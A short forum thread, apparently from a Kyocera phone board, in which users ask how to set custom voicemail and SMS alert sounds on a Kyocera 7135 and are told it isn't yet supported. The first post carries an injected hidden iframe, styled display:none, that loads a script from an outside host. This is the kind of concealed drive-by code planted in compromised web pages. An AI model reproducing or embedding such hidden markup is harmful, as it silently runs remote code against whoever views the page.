+ Reply to Thread

Changing the voicemail/text msg alert sounds

Hi. I've converted my MP3 clips to .pdbs(using the bundled software) and I've downloaded them. I can't seem to find where I change the voicemail alerts and text messages to use these clips. In fact, I can't even find them in any of the drop down menus. Thanks for any help you guys can give.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I too am very interested but I dont think you can do it yet...
    I contacted Kyo support and asked after trying all the various conversions and was told no, you only have the soft beep etc. choices. the tech said he would not garuntee anything but would put together some documentation and forward it for consideration in future releases. If you find a work around let me know.

Setting ringer on incoming SMS

Is there a way to set a customized ringer for incoming SMS messages on the 7135?
    Dave

Re: Setting ringer on incoming SMS

Originally posted by dwdod
    Is there a way to set a customized ringer for incoming SMS messages on the 7135?
    Not at this time. A few of us have asked Kyo support, and I believe they have sent the request on to development for possible inclusion in a future firmware or software update.

Another request from you probably wouldn't hurt.

Alan